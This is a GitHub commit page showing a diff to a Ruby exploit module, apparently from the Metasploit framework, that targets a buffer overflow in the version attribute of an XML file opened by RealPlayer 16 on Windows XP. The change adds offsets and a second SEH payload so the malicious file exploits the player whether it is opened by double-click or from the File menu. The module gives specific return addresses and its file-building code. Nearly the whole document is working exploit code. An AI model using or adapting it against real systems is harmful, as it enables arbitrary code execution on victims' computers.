Skip to content

Commit f687a14

Browse files
author
sgabe
committed
Added support for opening via menu.
1 parent 287271c commit f687a14

File tree

1 file changed

+11
-12
lines changed

1 file changed

+11
-12
lines changed

modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb

Lines changed: 11 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -49,16 +49,16 @@ def initialize(info = {})
4949
[
5050
[ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51',
5151
{
52-
'Offset' => 2540,
53-
'Ret' => 0x641930c8, # POP POP RET from rpap3260.dll
54-
'Max' => 3095, # overflow occurs at 3080 byte
52+
'OffsetClick' => 2540, # Open via double click
53+
'OffsetMenu' => 13600, # Open via File -> Open
54+
'Ret' => 0x641930C8, # POP POP RET from rpap3260.dll
5555
}
5656
],
5757
[ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
5858
{
59-
'Offset' => 2540,
60-
'Ret' => 0x63A630B8, # POP POP RET from rpap3260.dll
61-
'Max' => 3095, # overflow occurs at 3080 byte
59+
'OffsetClick' => 2540, # Open via double click
60+
'OffsetMenu' => 13600, # Open via File -> Open
61+
'Ret' => 0x63A630B8, # POP POP RET from rpap3260.dll
6262
}
6363
]
6464
],
@@ -76,16 +76,15 @@ def initialize(info = {})
7676

7777
def exploit
7878

79-
sploit = "<?xml version=\"";
80-
sploit << rand_text_alpha_upper(target['Offset'])
79+
sploit = rand_text_alpha_upper(target['OffsetClick'])
8180
sploit << generate_seh_payload(target.ret)
82-
sploit << make_nops(target['Max']-sploit.length)
83-
sploit << "\"?>";
81+
sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length)
82+
sploit << generate_seh_payload(target.ret)
83+
sploit << rand_text_alpha_upper(17000) # Generate exception
8484

8585
# Create the file
8686
print_status("Creating '#{datastore['FILENAME']}' file ...")
87-
88-
file_create(sploit)
87+
file_create("<?xml version=\"" + sploit + "\"?>")
8988

9089
end
9190
end

0 commit comments

Comments
 (0)